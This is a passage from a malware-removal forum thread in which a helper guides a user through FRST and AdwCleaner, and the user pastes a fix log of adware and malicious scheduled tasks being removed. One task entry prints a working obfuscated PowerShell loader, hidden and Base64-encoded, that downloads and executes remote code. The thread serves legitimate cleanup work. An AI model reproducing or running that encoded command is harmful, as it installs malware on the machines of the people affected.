Task: C:\Windows\Tasks\web_disco_notification_service.job => C:\Program Files (x86)\web disco\web_disco_notification_service.exeǥ/url='hxxp:/cdn.selectbestopt.com/notf_sys/index.html' /crregname='web disco' /appid='73143' /srcid='2913' /bic='c2622811f82ea9bcabadfd7993fe0e7c' /verifier='f674d3cc28017886611145c5672056c8' /installerversion='1.50.3.10' /statsdomain='hxxp:/stats.buildomserv.com/data.gif?' /errorsdomain='hxxp:/stats.buildomserv.com/data.gif?' /monetizationdomain='hxxp:/logs.buildomserv.com/monetization.gif <==== ATTENTION
end


NOTICE: This script was written specifically for this user, for use on that particular machine.
Running this on another machine may cause damage to your operating system


Run FRST / FSRT64 again like we did before but this time press the Fix button just once and wait.
The tool will make a log (Fixlog.txt) please post it to your reply.

---

How the computer is running now?

---

Double click on AdwCleaner.exe to run the tool again.
Vista / Windows 7/8 users right-click and select Run As Administrator.
  • Click on the Scan button.
  • AdwCleaner will begin to scan your computer like it did before.
  • When the scan has finished, the actual line should say "Pending. Please uncheck elements you do not want to remove". Look through the scan results and uncheck any entries that you do not wish to remove.
  • This time, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[C#].txt) will open automatically (where the largest value of # represents the most recent report).
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of that logfile will also be saved in the C:\AdwCleaner folder.

Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#12 dougsgirl

dougsgirl
  • Topic Starter

  • Members
  • 17 posts
  • OFFLINE
  •  
  • Local time:11:18 PM

Posted 18 January 2016 - 04:51 PM

It's running slow when connecting to webpages. It's also telling me when I go to google...
It said before this that the computer was not secure that someone might be trying to steal my information. 
 
Your clock is behind
 
A private connection to www.google.com can't be established because your computer's date and time (Friday, January 1, 2016 at 4:41:29 AM) are incorrect.NET::ERR_CERT_DATE_INVALID
 
 
 
 
 
 
Fix result of Farbar Recovery Scan Tool (x64) Version:17-01-2015
Ran by Nexus Media Server (2016-01-01 04:31:33) Run:2
Running from C:\Users\Nexus Media Server\Desktop
Loaded Profiles: Nexus Media Server (Available Profiles: Nexus Media Server & LogMeInRemoteUser)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
CreateRestorePoint:
EmptyTemp:
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\browser\defaults\preferences\my-prefs.js [2015-03-25] <==== ATTENTION (Points to *.cfg file) 
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\my.cfg [2015-03-25] <==== ATTENTION
C:\Users\Nexus Media Server\AppData\Local\Temp\10862.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\14750.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\19124.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\19388.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\6330.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\71569_updater.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\72893_updater.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\CitrixOnlineLauncher.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\InstallUtil.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\of3w9136.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\Setup_132952.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\ShopperProJSINJFull.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\SpOrder.dll 
C:\Users\Nexus Media Server\AppData\Local\Temp\tmpddewfv.dll 
C:\Users\Nexus Media Server\AppData\Local\Temp\Uninstall.exe
Task: {004783C0-9EA6-4286-9A05-E1787A0640AF} - \223cecce-1b0c-40e4-94c0-10568c9d47b2-3 -> No File <==== ATTENTION 
Task: {07202880-E71A-4494-90F4-574EA2ED61F3} - System32\Tasks\FQfcQIFiv3 => C:\Users\Nexus Media Server\AppData\Roaming\FQfcQIFiv3.exe <==== ATTENTION 
Task: {08FF94D8-344C-4F30-BFB8-93A4C5C12220} - \winter_web_updating_service -> No File <==== ATTENTION 
Task: {0AA08E94-3F52-4F9D-A4A8-6EE26ECF36FA} - System32\Tasks\cCDRV5n4y => C:\Users\Nexus Media Server\AppData\Roaming\cCDRV5n4y.exe <==== ATTENTION 
Task: {0E3C542A-35A3-40E0-ACE2-9126251072DD} - \22a55d69-9f00-4e39-9983-8a08b1069524-1 -> No File <==== ATTENTION 
Task: {106DC799-0B98-42D6-BCB4-3AC29DDAEC4A} - \3315ae47-db79-4ea6-b347-a4b2fa3cb91c-1-7 -> No File <==== ATTENTION 
Task: {10E01498-6644-4F73-B841-C1F525FFB3CF} - \APSnotifierPP3 -> No File <==== ATTENTION 
Task: {117EF788-AC55-498B-BB16-289EADC64420} - \b917f354-73c6-437f-845a-847de7226630-1 -> No File <==== ATTENTION 
Task: {11B20385-ACA6-459C-97EC-FE76D7101045} - \mr_fun_updating_service -> No File <==== ATTENTION 
Task: {1532EB26-4300-4818-BC84-C216413D6961} - \winter_web_notification_service -> No File <==== ATTENTION 
Task: {1CF5901D-E3A5-4F4E-9DCD-9E35A532D005} - \Test TimeTrigger -> No File <==== ATTENTION 
Task: {1E72DAC7-DBD4-4E7A-80C4-D07E7D1C4B1C} - \b917f354-73c6-437f-845a-847de7226630-4 -> No File <==== ATTENTION 
Task: {1F33128F-00A1-42D0-9781-2ED1A35FFEAC} - \223cecce-1b0c-40e4-94c0-10568c9d47b2-4 -> No File <==== ATTENTION 
Task: {1FA7F172-78F3-4EFB-B4DA-060CB9CC7CD9} - \Plus-HD-1.2-codedownloader -> No File <==== ATTENTION 
Task: {23DC0715-9230-40B6-8FB8-EDBBCE7A7A75} - \Plus-HD-1.2-updater -> No File <==== ATTENTION 
Task: {28646BCD-AA5A-4084-91D0-9C4E529B0FB6} - \web_disco_updating_service -> No File <==== ATTENTION 
Task: {2B6E52E0-F459-43DE-8D0E-0337660B3F7E} - \Groovorio Updater -> No File <==== ATTENTION 
Task: {2C8ACB8D-6D9B-4739-9DBE-515789E81AB0} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-1-6 -> No File <==== ATTENTION 
Task: {2E10B7D0-E7AE-4BE1-9595-4EA395F4B8BE} - \3315ae47-db79-4ea6-b347-a4b2fa3cb91c-1-6 -> No File <==== ATTENTION
Task: {313D31B2-A09D-4CA3-9C36-4B082D485326} - System32\Tasks\{3C3CCF23-D2A6-1550-6302-F9C39BC5A975} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAcABvAHIAdABuAGUAdwAuAG4AZQB0AC8AdQAvAD8AcQA9AGEASABzAGQASQBjAGMANgBkAHcAdwBiADcAZABuADMARAA4AGEAdABNAEgAeQBQAEgAeQBwAEIAdQBjAGwAegBNAEgAQwBuAE8AVgBUAEwAVQBPAG4AegBLADMARAAyADkAOABlAHoARQBUAEQAdwB0AHkANgBFADUAbwBUAHUASQBsADYAWQBiAFcAWQB3AEgATQBtAHMAUAB0AHkANgBLAHEAQwAzAFcAQwBQAFkAUAA0AG4AUQBpAHAANgBLAFkAdQBSADIAZgB0AEgAYgBRAE8ARAB1AE0ASQBkAG8AaABLAE8AWgByAC0AdgA4AFgAVwB1AGcATABtAGMAbgB1AGwAdgBLAHkAMwBWAG8ARQA1AG8AVQAtAGgAcABiAGQAbQBOADMAcgBMAE8AYwBOAEMAYgBKAFoAbgBGAEcAaQBRAG4AMwAxAFkAdgAyAHMASABEADAANgB6AGEAdgBLAEUASgBDADUAVABrAFMAOABRAHUAegBfAEUAeABLADkAUQBrAGUASgBNADAAUAA1AEIASwBDAE0AQQBfADgAWAB5AFkAWgBSAHMASgBiADgAMwBjADAASABUAHcAdwA4AHEAUgBsAFAAZwBJAHEAbgA1AEYAZgAwAGQAUgBkAHkAUQBVAFEATQBiADMAQQBxADQANwBmADYATwBZAFIARwB4AFMALQBPAG0AZQBmAEwAdgBvAHAAcwBFAGIAQQA5AFgAMABCADAAdAA4AFgAZABMAEQATwB6AE0ANwB0AG4ANwBzAFQAMgBWAEsASABhADcAagBtAGEAYwBSAHMALQAtAGkAVABWAEsAcABnAEoAbgBFAEcAegBNADAAbQB3ADUAdgAxAEgARQBLAGQAegA4AFQAXwBDAGYAdABnAEUANQBtADcAegBxAHYAagBxAHIAegBQAFYANgAxAGEAYgBpAGsAOABkADUANgBFAEoAVwBIAEIARQA0AG4AOABTADYAQgBGADgAcAAwAHkANgBzAEkAVwBPAGoAbABtAGMAYgBKAHEAUwBnAEUAQgBsAEEAaQBZAGgASgBaAEIAagBWAHMALQBMADYAUABFAE0AYgB2AHIAUQBQAEwAVwBUAHkARgAwAFYAWQBMAFMALQBOAGYAMgA5AEMAVQAzAFMAUABLAEEAcgBUAGUAWABGAHQAVQBLAEUANAA2AHkAUgBCAFAASAB6AGoAQQBlAGsAYgBQAHQAcgBiAE4ANQBwAFAAcwBjACYAYwA9AFkAVwBWADEAbQA4AFIATQB3AE0AUQBjADYAVwBkAEcAbQBjAFEATQB4ADUAcQB5AE8AOQAwAEgASwB3AEcANwBmAHgAZABNAGUAcwBnAGYAbABnAEEAZQAtAG0ARAB3AE4ANgBTAHgAcwBIADYAegBIADkAMgBFAEoAZwAyAHcAWABGADYATABOAGgAMQBKAGsATwA2AEkAWABtAGMAOQBSADAANwBKAGkAZwAzAHAAdABVAFYAMQBEAEUAMgA4AEIANQBwADYAVgBDAE8ATQB4ADUASQBiAFEAbwB6AHUAaABBAEYARwBIAE4AQQB5AEYAXwBZAFkAeABGAE4ASgBzAFYAYgBpAE8AagBLADkANwBRAEMAcgBmAFoASgB1AHEAbgBRAEgAcQBUAEgAcABMAGkASQBEAHkARgBtADEAXwBGAHAAcABWAHoAWgBWAGMAQQB1AGQAaQBEAEUAQwBPAHAAcwBvAEgAWgBhAEYAeAB5AFcAeAAwAGoAaQBMAEgAOABoAGsAYwB5AGcAVQBfAHAAawBYAFoAVQBzAE0AagBzAFYAZABTAHYALQBsAGEAVABWAGUAcQB3AGIANABGAGEAYQB4AGYATgAxAEQAXwBsAGIASgAzADEAYwBOAFUAUABjADIATgBaAEUAZwBvAE8AVgBGAGEANAAzADYAegBiAE8AVgBFAHoAZgBfAHQASABHAGgAaQBqAEkARQBCADAATwB5AG8AWQBjAEoAVgA5AEUAZgBtAGcAawA5AFgAOQBaAGMASAA4AEYAMABBAG8AWQBTAFYAaQA0AEkAdQBnAFcAMAB3AFIAWABjAHMAaQBmAHMAWABjAFUAdwBuAHoAdQB4AHcAWQBNAHoAbwBWAG8AegAtAHYASAB5AFIAdwBvAHMAQgBVAHQAQQBjAFUAVgAtAEYATwA2AHQAagBlAFoAdgA2ADUAeQBWAEgAZwByAG0ANQBBAEsAVwBrAG8ASwB1AG8AZAB5AE4AawBVAE8ATwBpAHMAaQBQAHYAbgBuAGQAYgBiAGoAZgBNAGIAawBHAFgAcwB2AHMAawBfAGcAVABGAEgAMABtAGcARwA2AEMAcABNADEAUwBVAHYAUgA3ADQAQgAwAEgAZQBoAHgAZABkAHoAUQBDAGcAQwBXAG0AUwBnAG8AbQBfADAAOABFADEAVgAzAHQAZgBKAFQAaAAyADkALQBSAGkAbgB5AHcAcgBpAHYAUABHAGoAcwBDAHIAWQBqAEgASwBJADMAagBFAEkAeQB1ADUAaABoAEcAUwB2AFoASABwAFoAQwBpAHEARwBsAHMAegBFAHQATwBEAEYAMwBOADMAZQBPADMATgBkAHkAdwA4AFAAawByAHoAaQAzADQAZwB1AE4AbQB5AHEASABTAFYAagBKADcATwBaAFQAeAAwAEEAVgBxAHoAbABfAHIAMwBDAEkAUgBiAFQAUQBNAEUANwBOADcAZQA3AHEAZABpAHoARwA2AG0ARgBCADIAMwBqAGEAVQBFAF8ARABpADIANQBNAHQAbgBEAGsAegBYAEwANQAxAHAATQBkAFcAUgBJADcAQwBmAHUAdwBsAHUAeQBNADYAVwBDAFgAegBBAHQAeQBXAGsAdwBtAGgANgBoAEsARgBYAG8AQwAxAFoANgByADUAMwBsAGwAVwBtAE8ARwBGAG8AbwBLAG8AaABDAE8AaABKAEIAaABUAHQATQBRAC0AdQAwAFUAagA4AEMAcABCAEQAUgA3ADAAcQBDADEASgBYAGEARABrADQASABuACYAcgA9ADcAOQAyADUANwA4ADUAMwA3ADQAMQAxADAAMQA2ADYAMgAwADIAIgA7ACQAcwB0AHMAawA9ACIAewAzAEMAMwBDAEMARgAyADMALQBEADIAQQA2AC0AMQA1ADUAMAAtADYAMwAwADIALQBGADkAQwAzADkAQgBDADUAQQA5ADcANQB9ACIAOwAkAHAAcgBpAGQAPQAiAEQAVAAiADsAJABpAG4AaQBkAD0AIgAwACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA 
Task: {37792BD1-5684-4410-B0BF-5B96C495EEFC} - \AmiUpdXp -> No File <==== ATTENTION 
Task: {37D64102-43DC-4669-9D5F-C440AEB03087} - \22a55d69-9f00-4e39-9983-8a08b1069524-11 -> No File <==== ATTENTION 
Task: {38F1EC87-431A-499C-A34D-8B09A2FC0DEA} - \ConsumerInputUpdateTaskMachineUA -> No File <==== ATTENTION 
Task: {3B372DA0-1811-4CD3-9E1D-D3D2D4EC3173} - \223cecce-1b0c-40e4-94c0-10568c9d47b2-11 -> No File <==== ATTENTION 
Task: {3C43E890-7B99-4AD9-9AF3-37569885100E} - \BlockAndSurf_wd -> No File <==== ATTENTION 
Task: {3EFFE333-49F0-4306-B0A4-80D42EE62B66} - \Web Protector Plus -> No File <==== ATTENTION 
Task: {40AB5D2F-AF98-458F-9470-4316D56135B6} - \BlockAndSurf Update -> No File <==== ATTENTION 
Task: {42ACA34C-C760-4936-8119-668BB10B8B0E} - \223cecce-1b0c-40e4-94c0-10568c9d47b2-1 -> No File <==== ATTENTION 
Task: {42C3BC7F-B50D-437C-83C9-B6565D8B745F} - \223cecce-1b0c-40e4-94c0-10568c9d47b2-5_user -> No File <==== ATTENTION 
Task: {42CD00F7-4928-4363-98D3-0824CA05303D} - \22a55d69-9f00-4e39-9983-8a08b1069524-5 -> No File <==== ATTENTION 
Task: {4466149E-D043-464C-B732-93424DF9FC68} - \ShopperPro -> No File <==== ATTENTION 
Task: {461C2034-2B07-43E8-83E4-31D7F5CD20C5} - System32\Tasks\Microsoft\Windows\Multimedia\SMupdate3 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update3 <==== ATTENTION 
Task: {4AF98EF8-6984-4E90-BB7F-01FE7746F0D7} - \b0220ba6-09e4-46a8-8a55-a353b242b387-1-6 -> No File <==== ATTENTION 
Task: {4B844AAB-C755-40E4-9068-7879730FDC6B} - \SPBIW_UpdateTask_Time_333630343534353131342d235b783432415b45345a2d6c -> No File <==== ATTENTION 
Task: {4BE81A3B-C5B7-45B8-B831-22723BEA8F81} - \a250569a-98c2-4048-95cc-84eb2edcd0f9-5_user -> No File <==== ATTENTION 
Task: {4DB861DF-AAAB-4E4F-AC9A-1F92599AD489} - System32\Tasks\web_disco_notification_service => C:\Program Files (x86)\web disco\web_disco_notification_service.exe <==== ATTENTION 
Task: {58570255-9E70-4643-998F-F9055538D54C} - \globalUpdateUpdateTaskMachineCore -> No File <==== ATTENTION 
Task: {59637119-1492-4349-BE78-8631BEE643C8} - \SMupdate1 -> No File <==== ATTENTION
Task: {5DA016D9-C794-4139-BF27-5ACAD8CDBB2E} - \b0220ba6-09e4-46a8-8a55-a353b242b387-5 -> No File <==== ATTENTION 
Task: {62FDB5B3-BF42-432F-BE5C-356D2481019A} - \APSnotifierPP2 -> No File <==== ATTENTION 
Task: {63472255-BB01-4824-A8D9-B9C82D1C6A02} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-10_user -> No File <==== ATTENTION 
Task: {6517AD94-3943-4B6C-993C-EACA97408A23} - \Smp -> No File <==== ATTENTION 
Task: {65C4EF77-BB66-4D8E-9C39-2F4489171801} - \Crossbrowse -> No File <==== ATTENTION 
Task: {712E5CBF-BCAC-48B5-93EC-17629C62F300} - \3315ae47-db79-4ea6-b347-a4b2fa3cb91c-5_user -> No File <==== ATTENTION 
Task: {781C8DC9-CB04-4B90-9CE2-6291058A0589} - \globalUpdateUpdateTaskMachineUA -> No File <==== ATTENTION 
Task: {798B4FF4-BC44-4454-911C-7304F1140372} - \b0220ba6-09e4-46a8-8a55-a353b242b387-1-7 -> No File <==== ATTENTION 
Task: {7CBB73C0-D878-4BD1-9424-77D2B5C9AD57} - \SMWUpd -> No File <==== ATTENTION 
Task: {7E01AD6B-5B26-471E-A0A8-CDF27242E872} - \SPDriver -> No File <==== ATTENTION 
Task: {7E430EB2-F0D4-45B6-912A-3C11D787E54F} - System32\Tasks\Microsoft\Windows\Maintenance\SMupdate2 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update2 <==== ATTENTION 
Task: {7E5C382B-DB86-431E-AEAB-8CF69D7ED911} - \Plus-HD-1.2-firefoxinstaller -> No File <==== ATTENTION 
Task: {80269159-B28E-4F13-9F6D-57EE3349B0A4} - \APSnotifierPP1 -> No File <==== ATTENTION 
Task: {8135D8E0-C759-4618-93E2-CEB3FE1A49CB} - \mr_fun_notification_service -> No File <==== ATTENTION 
Task: {81BAFA66-DB16-49F7-8263-631E6BE42114} - \3315ae47-db79-4ea6-b347-a4b2fa3cb91c-5 -> No File <==== ATTENTION 
Task: {8757F209-3D97-41C9-9C78-567B10E23B83} - \SMW_UpdateTask_Time_333630343534353131342d235b783432415b45345a2d6c -> No File <==== ATTENTION 
Task: {8C89D02C-C8D4-405C-9D65-CEDDB5C243EC} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-5_user -> No File <==== ATTENTION
Task: {9361744C-A1E3-465B-BA1A-1F2D434BE3EF} - \b917f354-73c6-437f-845a-847de7226630-5 -> No File <==== ATTENTION 
Task: {9470C9FA-D56F-41E0-8C31-E8FA3DCB4FC0} - System32\Tasks\Astromenda => C:\Users\NEXUSM~1\AppData\Roaming\ASTROM~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION 
Task: {953B56D7-95E9-45BE-9459-A7C8CEB53C11} - \CIMT_S-1-5-21-2978377406-116969058-805938779-1000 -> No File <==== ATTENTION 
Task: {96A1650B-6E48-4613-AEFE-34294AF2B26D} - System32\Tasks\SFUKRJBE => C:\ProgramData\25843018f2844fe49c67328b993d18ab\25843018f2844fe49c67328b993d18ab.exe <==== ATTENTION 
Task: {9DDBE0F0-05A4-44E6-ABD1-AAE13541F3EC} - System32\Tasks\YTDownloaderUpd => C:\Program Files (x86)\YTDownloader\updater.exe [2015-01-08] (Goobzo) <==== ATTENTION 
Task: {A191E52B-C012-403D-8103-0443BF5CA178} - \9a453951-0637-4363-87cf-6eacfdd0bf82-1-6 -> No File <==== ATTENTION
Task: {AD06492B-964B-4C66-BB1F-83DC7EBBBD31} - \b917f354-73c6-437f-845a-847de7226630-5_user -> No File <==== ATTENTION 
Task: {B5E519B9-EBB0-4D9D-A013-FFA9971E8283} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-5 -> No File <==== ATTENTION 
Task: {B601E839-C06C-4AB2-BBD3-42DA433CAAFF} - \ConsumerInputUpdateTaskMachineCore -> No File <==== ATTENTION 
Task: {B6A7C774-ED5B-432D-8D0A-B3063C4B8373} - \9a453951-0637-4363-87cf-6eacfdd0bf82-10_user -> No File <==== ATTENTION 
Task: {B7BE2A1B-D6B7-4E7D-94CB-825E8CBDE708} - \ShopperProJSUpd -> No File <==== ATTENTION 
Task: {BF1CCE45-F0D7-45C6-88F2-F44389676F8B} - System32\Tasks\4836 => C:\Windows\system32\wscript.exe [2009-07-13] (Microsoft Corporation) <==== ATTENTION 
Task: {C077B919-EDA9-4457-BB55-931550D31E88} - \a250569a-98c2-4048-95cc-84eb2edcd0f9-10_user -> No File <==== ATTENTION 
Task: {C6B6EC14-6034-4359-80BD-3CE1FE235DBB} - \gtaUpt -> No File <==== ATTENTION 
Task: {C7D4E715-84A9-4292-AFAC-2622CD5C7399} - \a250569a-98c2-4048-95cc-84eb2edcd0f9-5 -> No File <==== ATTENTION 
Task: {CA6705BB-2A84-4DE6-9B04-1D0292DB6CD2} - \b917f354-73c6-437f-845a-847de7226630-11 -> No File <==== ATTENTION 
Task: {CAE32489-38E8-4B9F-88EC-3E0547DEAA28} - \9a453951-0637-4363-87cf-6eacfdd0bf82-1-7 -> No File <==== ATTENTION 
Task: {CBA4CD96-C146-47E0-9698-CA27256BA2F7} - \22a55d69-9f00-4e39-9983-8a08b1069524-3 -> No File <==== ATTENTION 
Task: {CD272327-D23F-4471-A849-7FE0FF01090D} - \CIMT_daily_S-1-5-21-2978377406-116969058-805938779-1000 -> No File <==== ATTENTION 
Task: {CFB6165A-8D8A-4C3F-9E17-2F4E3B5D2EBE} - \SmartWeb Upgrade Trigger Task -> No File <==== ATTENTION 
Task: {D24800E9-D72F-4170-B523-E7C2AA29AF6A} - \22a55d69-9f00-4e39-9983-8a08b1069524-4 -> No File <==== ATTENTION 
Task: {D6FF6C58-6292-4C05-8B0D-57EC59C74B48} - \b0220ba6-09e4-46a8-8a55-a353b242b387-10_user -> No File <==== ATTENTION 
Task: {D833AA11-E23E-4B42-A1D9-9DB2EC492194} - System32\Tasks\YTDownloader => C:\Program Files (x86)\YTDownloader\YTDownloader.exe [2015-04-22] (YTDownloader) <==== ATTENTION
